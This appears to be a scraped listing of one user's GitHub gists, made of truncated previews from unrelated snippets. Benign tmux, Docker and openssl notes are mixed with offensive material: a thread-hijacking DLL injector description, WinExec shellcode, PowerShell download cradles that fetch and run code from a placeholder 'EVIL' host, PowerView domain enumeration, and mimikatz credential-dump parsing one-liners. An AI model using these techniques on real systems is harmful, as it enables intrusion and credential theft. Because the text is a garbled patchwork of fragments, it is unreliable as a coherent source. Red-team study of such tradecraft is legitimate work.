Dave Hardy davehardy20

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname

This program can injects DLL into running processes using thread hijacking. No remote thread is created, only existing thread is used for injection.

The injector injects shellcode into the target process, and then a running thread in the target process is hijacked to execute the injected code. The injected code calls the LoadLibrary function to load the DLL.

Usage: ZwInjector [PID] [DLL name]

Getting X11 GUI applications to work on OS X with Docker

$ brew install socat
$ brew cask install xquartz <--- assuming you don't already have XQuartz installed some other way
$ open -a XQuartz <--- start an XQuartz session

$ socat TCP-LISTEN:6000,reuseaddr,fork UNIX-CLIENT:\"$DISPLAY\"

Introduction

I wrote this gist to record the steps I followed to get docker running in my Raspberry Pi 3. The ARM ported debian version (Jessie) comes with an old version of docker. It is so old that the docker hub it tries to interact with doesn't work anymore :)

Hopefully this gist will help someone else to get docker running in their Raspberry Pi 3.

Installation

From original instructions at http://blog.hypriot.com/post/run-docker-rpi3-with-wifi/

	global _start
	_start:
	jmp short getWinExec
	callProc:
	pop ebx
	xor eax,eax
	push eax
	mov [ebx+40],al
	push ebx
	mov eax,0x7c8623ad ;WinExec

	# Loosely based on http://www.vistax64.com/powershell/202216-display-image-powershell.html

	[void][reflection.assembly]::LoadWithPartialName("System.Windows.Forms")

	$file = (get-item 'C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg')
	#$file = (get-item "c:\image.jpg")

	$img = [System.Drawing.Image]::Fromfile($file);

	# This tip from http://stackoverflow.com/questions/3358372/windows-forms-look-different-in-powershell-and-powershell-ise-why/3359274#3359274

	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object

	# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
	# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

	# get all the groups a user is effectively a member of, 'recursing up'
	Get-NetGroup -UserName <USER>

	# get all the effective members of a group, 'recursing down'
	Get-NetGroupMember -GoupName <GROUP> -Recurse

	# get the effective set of users who can administer a server

	#!/bin/bash

	usage()
	{
	cat <<EOF
	Usage: $(basename $0) [options]

	This shell script is a simple wrapper around the openssl binary. It uses
	s_client to get certificate information from remote hosts, or x509 for local
	certificate files. It can parse out some of the openssl output or just dump all

	Assuming you have a mimikatz dump named "mimikatz_dump.txt", I made these bash one-liners that will reformat the mimikatz output to "domain\user:password"

	First, before using these parsers, run: "dos2unix mimikatz_dump.txt"

	Mimikatz 1.0:

	cat mimikatz_dump.txt \| grep -P '((Utilisateur principal)\|(msv1_0)\|(kerberos)\|(ssp)\|(wdigest)\|(tspkg))\s+:\s+.+' \| grep -v 'n\.' \| sed -e 's/^\s\+[^:]:\s\+//' \| sed -e 's/Utilisateur principal\s\+:\s\+\(.\)$/\n\1/' \| sort -u


	Mimikatz 2.0 (unfortunately, you must "apt-get install pcregrep" because reasons):